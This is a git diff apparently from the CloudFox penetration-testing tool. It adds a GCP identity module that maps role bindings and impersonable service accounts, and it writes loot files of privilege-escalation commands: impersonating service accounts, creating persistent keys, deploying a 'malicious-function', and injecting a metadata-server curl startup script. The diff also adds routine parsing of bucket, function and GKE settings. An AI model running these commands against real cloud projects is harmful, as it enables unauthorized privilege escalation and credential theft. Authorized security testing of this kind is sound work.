sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type WhoAmIEnhancedOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o WhoAmIEnhancedOutput) TableFiles() []internal.TableFile { return o.Table } +func (o WhoAmIEnhancedOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPWhoAmIEnhancedCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_WHOAMI_ENHANCED_MODULE_NAME) + if err != nil { + return + } + + // Create module instance + module := &WhoAmIEnhancedModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + RoleBindings: []RoleBinding{}, + ImpersonationTargets: []ImpersonationTarget{}, + PrivEscPaths: []PrivilegeEscalationPath{}, + DangerousPermissions: []string{}, + LootMap: make(map[string]*internal.LootFile), + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *WhoAmIEnhancedModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Gathering comprehensive identity context...", GCP_WHOAMI_ENHANCED_MODULE_NAME) + + // Step 1: Get current identity + oauthService := OAuthService.NewOAuthService() + principal, err := oauthService.WhoAmI() + if err != nil { + logger.ErrorM(fmt.Sprintf("Error retrieving token info: %v", err), GCP_WHOAMI_ENHANCED_MODULE_NAME) + return + } + + m.Identity = IdentityContext{ + Email: principal.Email, + ProjectIDs: m.ProjectIDs, + } + + // Determine identity type + if strings.HasSuffix(principal.Email, ".gserviceaccount.com") { + m.Identity.Type = "serviceAccount" + } else { + m.Identity.Type = "user" + } + + logger.InfoM(fmt.Sprintf("Authenticated as: %s (%s)", m.Identity.Email, m.Identity.Type), GCP_WHOAMI_ENHANCED_MODULE_NAME) + + // Step 2: Get organization context + m.getOrganizationContext(ctx, logger) + + // Step 3: Get role bindings across projects + m.getRoleBindings(ctx, logger) + + // Step 4: Find impersonation targets + m.findImpersonationTargets(ctx, logger) + + // Step 5: Identify privilege escalation paths + m.identifyPrivEscPaths(ctx, logger) + + // Step 6: Generate loot + m.generateLoot() + + // Write output + m.writeOutput(ctx, logger) +} + +// getOrganizationContext retrieves organization and folder hierarchy +func (m *WhoAmIEnhancedModule) getOrganizationContext(ctx context.Context, logger internal.Logger) { + // Create resource manager client + crmService, err := cloudresourcemanager.NewService(ctx) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error creating CRM client: %v", err), GCP_WHOAMI_ENHANCED_MODULE_NAME) + } + return + } + + // Get project ancestry for each project + for _, projectID := range m.ProjectIDs { + resp, err := crmService.Projects.GetAncestry(projectID, &cloudresourcemanager.GetAncestryRequest{}).Do() + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error getting ancestry for project %s: %v", projectID, err), GCP_WHOAMI_ENHANCED_MODULE_NAME) + } + continue + } + + for _, ancestor := range resp.Ancestor { + switch ancestor.ResourceId.Type { + case "organization": + orgInfo := OrgInfo{ + OrgID: ancestor.ResourceId.Id, + Name: fmt.Sprintf("organizations/%s", ancestor.ResourceId.Id), + } + // Check if already added + exists := false + for _, o := range m.Identity.Organizations { + if o.OrgID == orgInfo.OrgID { + exists = true + break + } + } + if !exists { + m.Identity.Organizations = append(m.Identity.Organizations, orgInfo) + } + case "folder": + folderInfo := FolderInfo{ + Name: fmt.Sprintf("folders/%s", ancestor.ResourceId.Id), + } + // Check if already added + exists := false + for _, f := range m.Identity.Folders { + if f.Name == folderInfo.Name { + exists = true + break + } + } + if !exists { + m.Identity.Folders = append(m.Identity.Folders, folderInfo) + } + } + } + } + + if len(m.Identity.Organizations) > 0 { + logger.InfoM(fmt.Sprintf("Found %d organization(s), %d folder(s)", len(m.Identity.Organizations), len(m.Identity.Folders)), GCP_WHOAMI_ENHANCED_MODULE_NAME) + } +} + +// getRoleBindings retrieves IAM role bindings for the current identity +func (m *WhoAmIEnhancedModule) getRoleBindings(ctx context.Context, logger internal.Logger) { + iamService := IAMService.New() + + // Determine the member format for current identity + var memberPrefix string + if m.Identity.Type == "serviceAccount" { + memberPrefix = "serviceAccount:" + } else { + memberPrefix = "user:" + } + fullMember := memberPrefix + m.Identity.Email + + // Get role bindings from each project + for _, projectID := range m.ProjectIDs { + // Use PrincipalsWithRolesEnhanced which includes inheritance + principals, err := iamService.PrincipalsWithRolesEnhanced(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error getting IAM bindings for project %s: %v", projectID, err), GCP_WHOAMI_ENHANCED_MODULE_NAME) + } + continue + } + + // Find bindings for the current identity + for _, principal := range principals { + if principal.Name == fullMember || principal.Email == m.Identity.Email { + for _, binding := range principal.PolicyBindings { + rb := RoleBinding{ + Role: binding.Role, + Scope: binding.ResourceType, + ScopeID: binding.ResourceID, + Inherited: binding.IsInherited, + } + if binding.HasCondition && binding.ConditionInfo != nil { + rb.Condition = binding.ConditionInfo.Title + } + + // Check for dangerous permissions + if isDangerousRole(binding.Role) { + m.DangerousPermissions = append(m.DangerousPermissions, fmt.Sprintf("%s on %s", binding.Role, binding.ResourceID)) + } + + m.mu.Lock() + m.RoleBindings = append(m.RoleBindings, rb) + m.mu.Unlock() + } + } + } + } + + logger.InfoM(fmt.Sprintf("Found %d role binding(s) for current identity", len(m.RoleBindings)), GCP_WHOAMI_ENHANCED_MODULE_NAME) +} + +// findImpersonationTargets identifies service accounts that can be impersonated +func (m *WhoAmIEnhancedModule) findImpersonationTargets(ctx context.Context, logger internal.Logger) { + iamService := IAMService.New() + + // Determine the member format for current identity + var memberPrefix string + if m.Identity.Type == "serviceAccount" { + memberPrefix = "serviceAccount:" + } else { + memberPrefix = "user:" + } + fullMember := memberPrefix + m.Identity.Email + + for _, projectID := range m.ProjectIDs { + // Get all service accounts in the project + serviceAccounts, err := iamService.ServiceAccounts(projectID) + if err != nil { + continue + } + + for _, sa := range serviceAccounts { + // Check if current identity can impersonate this SA using GetServiceAccountIAMPolicy + impersonationInfo, err := iamService.GetServiceAccountIAMPolicy(ctx, sa.Email, projectID) + if err != nil { + continue + } + + // Check if current identity is in the token creators or key creators list + canImpersonate := false + canCreateKeys := false + canActAs := false + + for _, tc := range impersonationInfo.TokenCreators { + if tc == fullMember || tc == m.Identity.Email || tc == "allUsers" || tc == "allAuthenticatedUsers" { + canImpersonate = true + break + } + } + + for _, kc := range impersonationInfo.KeyCreators { + if kc == fullMember || kc == m.Identity.Email || kc == "allUsers" || kc == "allAuthenticatedUsers" { + canCreateKeys = true + break + } + } + + for _, aa := range impersonationInfo.ActAsUsers { + if aa == fullMember || aa == m.Identity.Email || aa == "allUsers" || aa == "allAuthenticatedUsers" { + canActAs = true + break + } + } + + if canImpersonate || canCreateKeys || canActAs { + target := ImpersonationTarget{ + ServiceAccount: sa.Email, + ProjectID: projectID, + CanImpersonate: canImpersonate, + CanCreateKeys: canCreateKeys, + CanActAs: canActAs, + } + m.ImpersonationTargets = append(m.ImpersonationTargets, target) + } + } + } + + if len(m.ImpersonationTargets) > 0 { + logger.InfoM(fmt.Sprintf("[PENTEST] Found %d service account(s) that can be impersonated", len(m.ImpersonationTargets)), GCP_WHOAMI_ENHANCED_MODULE_NAME) + } +} + +// identifyPrivEscPaths identifies privilege escalation paths based on current permissions +func (m *WhoAmIEnhancedModule) identifyPrivEscPaths(ctx context.Context, logger internal.Logger) { + // Check for privilege escalation opportunities based on role bindings + for _, rb := range m.RoleBindings { + paths := getPrivEscPathsForRole(rb.Role, rb.ScopeID) + m.PrivEscPaths = append(m.PrivEscPaths, paths...) + } + + // Check impersonation-based privilege escalation + for _, target := range m.ImpersonationTargets { + if target.CanImpersonate { + path := PrivilegeEscalationPath{ + Name: fmt.Sprintf("Impersonate %s", target.ServiceAccount), + Description: "Can generate access tokens for this service account", + Risk: "HIGH", + Command: fmt.Sprintf("gcloud auth print-access-token --impersonate-service-account=%s", target.ServiceAccount), + } + m.PrivEscPaths = append(m.PrivEscPaths, path) + } + + if target.CanCreateKeys { + path := PrivilegeEscalationPath{ + Name: fmt.Sprintf("Create key for %s", target.ServiceAccount), + Description: "Can create persistent service account keys", + Risk: "CRITICAL", + Command: fmt.Sprintf("gcloud iam service-accounts keys create key.json --iam-account=%s", target.ServiceAccount), + } + m.PrivEscPaths = append(m.PrivEscPaths, path) + } + } + + if len(m.PrivEscPaths) > 0 { + logger.InfoM(fmt.Sprintf("[PRIVESC] Found %d privilege escalation path(s)", len(m.PrivEscPaths)), GCP_WHOAMI_ENHANCED_MODULE_NAME) + } +} + +// isDangerousRole checks if a role is considered dangerous +func isDangerousRole(role string) bool { + dangerousRoles := []string{ + "roles/owner", + "roles/editor", + "roles/iam.securityAdmin", + "roles/iam.serviceAccountAdmin", + "roles/iam.serviceAccountKeyAdmin", + "roles/iam.serviceAccountTokenCreator", + "roles/resourcemanager.organizationAdmin", + "roles/resourcemanager.folderAdmin", + "roles/resourcemanager.projectIamAdmin", + "roles/cloudfunctions.admin", + "roles/compute.admin", + "roles/container.admin", + "roles/storage.admin", + } + + for _, dr := range dangerousRoles { + if role == dr { + return true + } + } + return false +} + +// getPrivEscPathsForRole returns privilege escalation paths for a given role +func getPrivEscPathsForRole(role, projectID string) []PrivilegeEscalationPath { + var paths []PrivilegeEscalationPath + + switch role { + case "roles/iam.serviceAccountTokenCreator": + paths = append(paths, PrivilegeEscalationPath{ + Name: "Token Creator - Impersonate any SA", + Description: "Can generate access tokens for any service account in the project", + Risk: "CRITICAL", + Command: fmt.Sprintf("gcloud iam service-accounts list --project=%s", projectID), + }) + case "roles/iam.serviceAccountKeyAdmin": + paths = append(paths, PrivilegeEscalationPath{ + Name: "Key Admin - Create persistent keys", + Description: "Can create service account keys for any SA", + Risk: "CRITICAL", + Command: fmt.Sprintf("gcloud iam service-accounts list --project=%s", projectID), + }) + case "roles/cloudfunctions.admin": + paths = append(paths, PrivilegeEscalationPath{ + Name: "Cloud Functions Admin - Code Execution", + Description: "Can deploy Cloud Functions with SA permissions", + Risk: "HIGH", + Command: "gcloud functions deploy malicious-function --runtime=python39 --trigger-http --service-account=", + }) + case "roles/compute.admin": + paths = append(paths, PrivilegeEscalationPath{ + Name: "Compute Admin - Metadata Injection", + Description: "Can add startup scripts with SA access", + Risk: "HIGH", + Command: "gcloud compute instances add-metadata --metadata=startup-script='curl -H \"Metadata-Flavor: Google\" http://metadata/...'", + }) + case "roles/container.admin": + paths = append(paths, PrivilegeEscalationPath{ + Name: "Container Admin - Pod Deployment", + Description: "Can deploy pods with service account access", + Risk: "HIGH", + Command: fmt.Sprintf("gcloud container clusters get-credentials --project=%s", projectID), + }) + case "roles/owner", "roles/editor": + paths = append(paths, PrivilegeEscalationPath{ + Name: "Owner/Editor - Full Project Access", + Description: "Has full control over project resources", + Risk: "CRITICAL", + Command: fmt.Sprintf("gcloud projects get-iam-policy %s", projectID), + }) + } + + return paths +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *WhoAmIEnhancedModule) initializeLootFiles() { + m.LootMap["whoami-context"] = &internal.LootFile{ + Name: "whoami-context", + Contents: "# GCP Identity Context\n# Generated by CloudFox\n\n", + } + m.LootMap["whoami-permissions"] = &internal.LootFile{ + Name: "whoami-permissions", + Contents: "# Current Identity Permissions\n# Generated by CloudFox\n\n", + } + m.LootMap["whoami-impersonation"] = &internal.LootFile{ + Name: "whoami-impersonation", + Contents: "# Service Account Impersonation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization!\n\n", + } + m.LootMap["whoami-privesc"] = &internal.LootFile{ + Name: "whoami-privesc", + Contents: "# Privilege Escalation Paths\n# Generated by CloudFox\n# WARNING: Only use with proper authorization!\n\n", + } +} + +func (m *WhoAmIEnhancedModule) generateLoot() { + // Context loot + m.LootMap["whoami-context"].Contents += fmt.Sprintf( + "Identity: %s\n"+ + "Type: %s\n"+ + "Projects: %s\n"+ + "Organizations: %d\n"+ + "Folders: %d\n\n", + m.Identity.Email, + m.Identity.Type, + strings.Join(m.Identity.ProjectIDs, ", "), + len(m.Identity.Organizations), + len(m.Identity.Folders), + ) + + // Permissions loot + for _, rb := range m.RoleBindings { + m.LootMap["whoami-permissions"].Contents += fmt.Sprintf( + "%s on %s/%s\n", + rb.Role, + rb.Scope, + rb.ScopeID, + ) + } + + // Impersonation loot + for _, target := range m.ImpersonationTargets { + m.LootMap["whoami-impersonation"].Contents += fmt.Sprintf( + "# Service Account: %s\n"+ + "# Project: %s\n", + target.ServiceAccount, + target.ProjectID, + ) + if target.CanImpersonate { + m.LootMap["whoami-impersonation"].Contents += fmt.Sprintf( + "gcloud auth print-access-token --impersonate-service-account=%s\n", + target.ServiceAccount, + ) + } + if target.CanCreateKeys { + m.LootMap["whoami-impersonation"].Contents += fmt.Sprintf( + "gcloud iam service-accounts keys create key.json --iam-account=%s\n", + target.ServiceAccount, + ) + } + m.LootMap["whoami-impersonation"].Contents += "\n" + } + + // Privilege escalation loot + for _, path := range m.PrivEscPaths { + m.LootMap["whoami-privesc"].Contents += fmt.Sprintf( + "## %s [%s]\n"+ + "# %s\n"+ + "%s\n\n", + path.Name, + path.Risk, + path.Description, + path.Command, + ) + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *WhoAmIEnhancedModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Identity table + identityHeader := []string{ + "Property", + "Value", + } + + identityBody := [][]string{ + {"Email", m.Identity.Email}, + {"Type", m.Identity.Type}, + {"Projects", strings.Join(m.Identity.ProjectIDs, ", ")}, + {"Organizations", fmt.Sprintf("%d", len(m.Identity.Organizations))}, + {"Folders", fmt.Sprintf("%d", len(m.Identity.Folders))}, + {"Role Bindings", fmt.Sprintf("%d", len(m.RoleBindings))}, + {"Impersonation Targets", fmt.Sprintf("%d", len(m.ImpersonationTargets))}, + {"Privilege Escalation Paths", fmt.Sprintf("%d", len(m.PrivEscPaths))}, + } + + // Role bindings table + rolesHeader := []string{ + "Role", + "Scope", + "Scope ID", + } + + var rolesBody [][]string + for _, rb := range m.RoleBindings { + rolesBody = append(rolesBody, []string{ + rb.Role, + rb.Scope, + rb.ScopeID, + }) + } + + // Impersonation targets table + impersonationHeader := []string{ + "Service Account", + "Project", + "Can Impersonate", + "Can Create Keys", + "Can ActAs", + } + + var impersonationBody [][]string + for _, target := range m.ImpersonationTargets { + impersonationBody = append(impersonationBody, []string{ + target.ServiceAccount, + target.ProjectID, + whoamiBoolToYesNo(target.CanImpersonate), + whoamiBoolToYesNo(target.CanCreateKeys), + whoamiBoolToYesNo(target.CanActAs), + }) + } + + // Privilege escalation table + privescHeader := []string{ + "Path Name", + "Risk", + "Description", + "Command", + } + + var privescBody [][]string + for _, path := range m.PrivEscPaths { + privescBody = append(privescBody, []string{ + path.Name, + path.Risk, + path.Description, + truncateString(path.Command, 50), + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables + tables := []internal.TableFile{ + { + Name: "whoami-identity", + Header: identityHeader, + Body: identityBody, + }, + } + + if len(rolesBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "whoami-roles", + Header: rolesHeader, + Body: rolesBody, + }) + } + + if len(impersonationBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "whoami-impersonation", + Header: impersonationHeader, + Body: impersonationBody, + }) + } + + if len(privescBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "whoami-privesc", + Header: privescHeader, + Body: privescBody, + }) + } + + output := WhoAmIEnhancedOutput{ + Table: tables, + Loot: lootFiles, + } + + // Write output + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + m.ProjectIDs, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_WHOAMI_ENHANCED_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// whoamiBoolToYesNo converts a boolean to "Yes" or "No" +func whoamiBoolToYesNo(b bool) string { + if b { + return "Yes" + } + return "No" +} diff --git a/gcp/services/cloudStorageService/cloudStorageService.go b/gcp/services/cloudStorageService/cloudStorageService.go index e7d51b6c..e62fa8df 100644 --- a/gcp/services/cloudStorageService/cloudStorageService.go +++ b/gcp/services/cloudStorageService/cloudStorageService.go @@ -40,6 +40,21 @@ type IAMBinding struct { Members []string `json:"members"` } +// LifecycleRule represents a single lifecycle rule on a bucket +type LifecycleRule struct { + Action string `json:"action"` // Delete, SetStorageClass, AbortIncompleteMultipartUpload + StorageClass string `json:"storageClass"` // Target storage class (for SetStorageClass) + AgeDays int64 `json:"ageDays"` // Age condition in days + NumVersions int64 `json:"numVersions"` // Number of newer versions condition + IsLive *bool `json:"isLive"` // Whether object is live (vs archived) + MatchesPrefix string `json:"matchesPrefix"` // Object name prefix match + MatchesSuffix string `json:"matchesSuffix"` // Object name suffix match + MatchesStorage string `json:"matchesStorage"` // Storage class match + CreatedBefore string `json:"createdBefore"` // Created before date condition + DaysSinceCustom int64 `json:"daysSinceCustom"` // Days since custom time + DaysSinceNoncurrent int64 `json:"daysSinceNoncurrent"` // Days since became noncurrent +} + // BucketInfo contains bucket metadata and security-relevant configuration type BucketInfo struct { // Basic info @@ -66,6 +81,16 @@ type BucketInfo struct { AutoclassEnabled bool `json:"autoclassEnabled"` // Autoclass feature enabled AutoclassTerminalClass string `json:"autoclassTerminalClass"` // Terminal storage class for autoclass + // Lifecycle configuration + LifecycleEnabled bool `json:"lifecycleEnabled"` // Has lifecycle rules + LifecycleRuleCount int `json:"lifecycleRuleCount"` // Number of lifecycle rules + LifecycleRules []LifecycleRule `json:"lifecycleRules"` // Parsed lifecycle rules + HasDeleteRule bool `json:"hasDeleteRule"` // Has a delete action rule + HasArchiveRule bool `json:"hasArchiveRule"` // Has a storage class transition rule + ShortestDeleteDays int64 `json:"shortestDeleteDays"` // Shortest delete age in days + TurboReplication bool `json:"turboReplication"` // Turbo replication enabled (dual-region) + LocationType string `json:"locationType"` // "region", "dual-region", or "multi-region" + // Public access indicators IsPublic bool `json:"isPublic"` // Has allUsers or allAuthenticatedUsers PublicAccess string `json:"publicAccess"` // "None", "allUsers", "allAuthenticatedUsers", or "Both" @@ -335,4 +360,78 @@ func (cs *CloudStorageService) enrichBucketFromRestAPI(ctx context.Context, buck bucket.Updated = t.Format("2006-01-02") } } + + // Parse location type + bucket.LocationType = restBucket.LocationType + + // Parse Turbo Replication (for dual-region buckets) + if restBucket.Rpo == "ASYNC_TURBO" { + bucket.TurboReplication = true + } + + // Parse Lifecycle rules + if restBucket.Lifecycle != nil && len(restBucket.Lifecycle.Rule) > 0 { + bucket.LifecycleEnabled = true + bucket.LifecycleRuleCount = len(restBucket.Lifecycle.Rule) + bucket.ShortestDeleteDays = -1 // Initialize to -1 to indicate not set + + for _, rule := range restBucket.Lifecycle.Rule { + lcRule := LifecycleRule{} + + // Parse action + if rule.Action != nil { + lcRule.Action = rule.Action.Type + lcRule.StorageClass = rule.Action.StorageClass + + if rule.Action.Type == "Delete" { + bucket.HasDeleteRule = true + } else if rule.Action.Type == "SetStorageClass" { + bucket.HasArchiveRule = true + } + } + + // Parse conditions + if rule.Condition != nil { + // Age is a pointer to int64 + if rule.Condition.Age != nil && *rule.Condition.Age > 0 { + lcRule.AgeDays = *rule.Condition.Age + // Track shortest delete age + if lcRule.Action == "Delete" && (bucket.ShortestDeleteDays == -1 || *rule.Condition.Age < bucket.ShortestDeleteDays) { + bucket.ShortestDeleteDays = *rule.Condition.Age + } + } + if rule.Condition.NumNewerVersions > 0 { + lcRule.NumVersions = rule.Condition.NumNewerVersions + } + if rule.Condition.IsLive != nil { + lcRule.IsLive = rule.Condition.IsLive + } + if len(rule.Condition.MatchesPrefix) > 0 { + lcRule.MatchesPrefix = strings.Join(rule.Condition.MatchesPrefix, ",") + } + if len(rule.Condition.MatchesSuffix) > 0 { + lcRule.MatchesSuffix = strings.Join(rule.Condition.MatchesSuffix, ",") + } + if len(rule.Condition.MatchesStorageClass) > 0 { + lcRule.MatchesStorage = strings.Join(rule.Condition.MatchesStorageClass, ",") + } + if rule.Condition.CreatedBefore != "" { + lcRule.CreatedBefore = rule.Condition.CreatedBefore + } + if rule.Condition.DaysSinceCustomTime > 0 { + lcRule.DaysSinceCustom = rule.Condition.DaysSinceCustomTime + } + if rule.Condition.DaysSinceNoncurrentTime > 0 { + lcRule.DaysSinceNoncurrent = rule.Condition.DaysSinceNoncurrentTime + } + } + + bucket.LifecycleRules = append(bucket.LifecycleRules, lcRule) + } + + // If no delete rule, reset to 0 + if bucket.ShortestDeleteDays == -1 { + bucket.ShortestDeleteDays = 0 + } + } } diff --git a/gcp/services/functionsService/functionsService.go b/gcp/services/functionsService/functionsService.go index 6f757976..cf68eb58 100644 --- a/gcp/services/functionsService/functionsService.go +++ b/gcp/services/functionsService/functionsService.go @@ -36,11 +36,20 @@ type FunctionInfo struct { VPCEgressSettings string // PRIVATE_RANGES_ONLY, ALL_TRAFFIC AllTrafficOnLatest bool + // Resource configuration (new enhancements) + AvailableMemoryMB int64 // Memory in MB + AvailableCPU string // CPU (e.g., "1", "2") + TimeoutSeconds int64 // Timeout in seconds + MaxInstanceCount int64 // Max concurrent instances + MinInstanceCount int64 // Min instances (cold start prevention) + MaxInstanceRequestConcurrency int64 // Max concurrent requests per instance + // Trigger info TriggerType string // HTTP, Pub/Sub, Cloud Storage, etc. TriggerURL string // For HTTP functions TriggerEventType string TriggerResource string + TriggerRetryPolicy string // RETRY_POLICY_RETRY, RETRY_POLICY_DO_NOT_RETRY // Environment variables (sanitized - just names, not values) EnvVarCount int @@ -59,6 +68,9 @@ type FunctionInfo struct { SourceType string // GCS, Repository RiskLevel string // CRITICAL, HIGH, MEDIUM, LOW RiskReasons []string // Why it's risky + + // Cold start analysis + ColdStartRisk string // HIGH, MEDIUM, LOW based on min instances } // FunctionSecurityAnalysis contains detailed security analysis for a function @@ -158,6 +170,35 @@ func parseFunctionInfo(fn *cloudfunctions.Function, projectID string) FunctionIn info.VPCEgressSettings = fn.ServiceConfig.VpcConnectorEgressSettings info.AllTrafficOnLatest = fn.ServiceConfig.AllTrafficOnLatestRevision + // Resource configuration (new enhancements) + if fn.ServiceConfig.AvailableMemory != "" { + // Parse memory string (e.g., "256M", "1G") + memStr := fn.ServiceConfig.AvailableMemory + if strings.HasSuffix(memStr, "M") { + if val, err := parseMemoryMB(memStr); err == nil { + info.AvailableMemoryMB = val + } + } else if strings.HasSuffix(memStr, "G") { + if val, err := parseMemoryMB(memStr); err == nil { + info.AvailableMemoryMB = val + } + } + } + info.AvailableCPU = fn.ServiceConfig.AvailableCpu + info.TimeoutSeconds = fn.ServiceConfig.TimeoutSeconds + info.MaxInstanceCount = fn.ServiceConfig.MaxInstanceCount + info.MinInstanceCount = fn.ServiceConfig.MinInstanceCount + info.MaxInstanceRequestConcurrency = fn.ServiceConfig.MaxInstanceRequestConcurrency + + // Cold start risk analysis + if info.MinInstanceCount > 0 { + info.ColdStartRisk = "LOW" + } else if info.MaxInstanceCount > 100 { + info.ColdStartRisk = "MEDIUM" + } else { + info.ColdStartRisk = "HIGH" + } + // Extract environment variable names (pentest-relevant - may hint at secrets) if fn.ServiceConfig.EnvironmentVariables != nil { info.EnvVarCount = len(fn.ServiceConfig.EnvironmentVariables) @@ -377,3 +418,31 @@ func containsSensitiveKeyword(name string) bool { } return false } + +// parseMemoryMB parses a memory string like "256M" or "1G" to MB +func parseMemoryMB(memStr string) (int64, error) { + memStr = strings.TrimSpace(memStr) + if len(memStr) == 0 { + return 0, fmt.Errorf("empty memory string") + } + + unit := memStr[len(memStr)-1] + valueStr := memStr[:len(memStr)-1] + + var value int64 + _, err := fmt.Sscanf(valueStr, "%d", &value) + if err != nil { + return 0, err + } + + switch unit { + case 'M', 'm': + return value, nil + case 'G', 'g': + return value * 1024, nil + case 'K', 'k': + return value / 1024, nil + default: + return 0, fmt.Errorf("unknown unit: %c", unit) + } +} diff --git a/gcp/services/gkeService/gkeService.go b/gcp/services/gkeService/gkeService.go index b231e1f7..2330a648 100644 --- a/gcp/services/gkeService/gkeService.go +++ b/gcp/services/gkeService/gkeService.go @@ -62,6 +62,20 @@ type ClusterInfo struct { TotalNodeCount int AutoscalingEnabled bool + // GKE Autopilot + Autopilot bool + + // Node Auto-provisioning + NodeAutoProvisioning bool + + // Maintenance configuration + MaintenanceWindow string + MaintenanceExclusions []string + + // Addons + ConfigConnector bool + IstioEnabled bool // Anthos Service Mesh / Istio + // Security issues detected SecurityIssues []string } @@ -233,6 +247,40 @@ func parseClusterInfo(cluster *container.Cluster, projectID string) ClusterInfo } } + // GKE Autopilot mode + if cluster.Autopilot != nil { + info.Autopilot = cluster.Autopilot.Enabled + } + + // Node Auto-provisioning + if cluster.Autoscaling != nil { + info.NodeAutoProvisioning = cluster.Autoscaling.EnableNodeAutoprovisioning + } + + // Maintenance configuration + if cluster.MaintenancePolicy != nil && cluster.MaintenancePolicy.Window != nil { + window := cluster.MaintenancePolicy.Window + if window.DailyMaintenanceWindow != nil { + info.MaintenanceWindow = fmt.Sprintf("Daily at %s", window.DailyMaintenanceWindow.StartTime) + } else if window.RecurringWindow != nil { + info.MaintenanceWindow = fmt.Sprintf("Recurring: %s", window.RecurringWindow.Recurrence) + } + // Maintenance exclusions + for name := range window.MaintenanceExclusions { + info.MaintenanceExclusions = append(info.MaintenanceExclusions, name) + } + } + + // Addons configuration + if cluster.AddonsConfig != nil { + // Config Connector + if cluster.AddonsConfig.ConfigConnectorConfig != nil { + info.ConfigConnector = cluster.AddonsConfig.ConfigConnectorConfig.Enabled + } + // Note: IstioConfig was deprecated and removed from the GKE API + // Anthos Service Mesh (ASM) is now the recommended approach + } + // Identify security issues info.SecurityIssues = identifySecurityIssues(info) diff --git a/globals/gcp.go b/globals/gcp.go index 4d6ab054..07c85d0e 100644 --- a/globals/gcp.go +++ b/globals/gcp.go @@ -61,6 +61,19 @@ const GCP_NETWORKENDPOINTS_MODULE_NAME string = "network-endpoints" const GCP_CLOUDARMOR_MODULE_NAME string = "cloud-armor" const GCP_CERTMANAGER_MODULE_NAME string = "cert-manager" +// New security analysis modules (Azure equivalents) +const GCP_SECURITYCENTER_MODULE_NAME string = "security-center" +const GCP_WHOAMI_ENHANCED_MODULE_NAME string = "whoami-full" +const GCP_LATERALMOVEMENT_MODULE_NAME string = "lateral-movement" +const GCP_NETWORKEXPOSURE_MODULE_NAME string = "network-exposure" +const GCP_DATAEXFILTRATION_MODULE_NAME string = "data-exfiltration" +const GCP_BACKUPINVENTORY_MODULE_NAME string = "backup-inventory" +const GCP_COMPLIANCEDASHBOARD_MODULE_NAME string = "compliance-dashboard" +const GCP_COSTSECURITY_MODULE_NAME string = "cost-security" +const GCP_MONITORINGALERTS_MODULE_NAME string = "monitoring-alerts" +const GCP_NETWORKTOPOLOGY_MODULE_NAME string = "network-topology" +const GCP_IDENTITYPROTECTION_MODULE_NAME string = "identity-protection" + // Verbosity levels (matching Azure pattern) var GCP_VERBOSITY int = 0 diff --git a/go.mod b/go.mod index a47b1689..e3398fdf 100644 --- a/go.mod +++ b/go.mod @@ -90,7 +90,6 @@ require ( cloud.google.com/go/accesscontextmanager v1.9.7 // indirect cloud.google.com/go/auth v0.17.0 // indirect cloud.google.com/go/auth/oauth2adapt v0.2.8 // indirect - cloud.google.com/go/monitoring v1.24.3 // indirect cloud.google.com/go/orgpolicy v1.15.1 // indirect cloud.google.com/go/osconfig v1.15.1 // indirect github.com/GoogleCloudPlatform/opentelemetry-operations-go/detectors/gcp v1.30.0 // indirect @@ -142,6 +141,8 @@ require ( require ( cloud.google.com/go/asset v1.22.0 cloud.google.com/go/logging v1.13.1 + cloud.google.com/go/monitoring v1.24.3 + cloud.google.com/go/securitycenter v1.38.1 github.com/aws/aws-sdk-go-v2/service/kms v1.49.4 golang.org/x/oauth2 v0.34.0 google.golang.org/api v0.257.0 diff --git a/go.sum b/go.sum index 3d0210ae..f714eda3 100644 --- a/go.sum +++ b/go.sum @@ -34,6 +34,8 @@ cloud.google.com/go/resourcemanager v1.10.7 h1:oPZKIdjyVTuag+D4HF7HO0mnSqcqgjcuA cloud.google.com/go/resourcemanager v1.10.7/go.mod h1:rScGkr6j2eFwxAjctvOP/8sqnEpDbQ9r5CKwKfomqjs= cloud.google.com/go/secretmanager v1.16.0 h1:19QT7ZsLJ8FSP1k+4esQvuCD7npMJml6hYzilxVyT+k= cloud.google.com/go/secretmanager v1.16.0/go.mod h1://C/e4I8D26SDTz1f3TQcddhcmiC3rMEl0S1Cakvs3Q= +cloud.google.com/go/securitycenter v1.38.1 h1:D9zpeguY4frQU35GBw8+M6Gw79CiuTF9iVs4sFm3FDY= +cloud.google.com/go/securitycenter v1.38.1/go.mod h1:Ge2D/SlG2lP1FrQD7wXHy8qyeloRenvKXeB4e7zO6z0= cloud.google.com/go/storage v1.58.0 h1:PflFXlmFJjG/nBeR9B7pKddLQWaFaRWx4uUi/LyNxxo= cloud.google.com/go/storage v1.58.0/go.mod h1:cMWbtM+anpC74gn6qjLh+exqYcfmB9Hqe5z6adx+CLI= cloud.google.com/go/trace v1.11.7 h1:kDNDX8JkaAG3R2nq1lIdkb7FCSi1rCmsEtKVsty7p+U= From 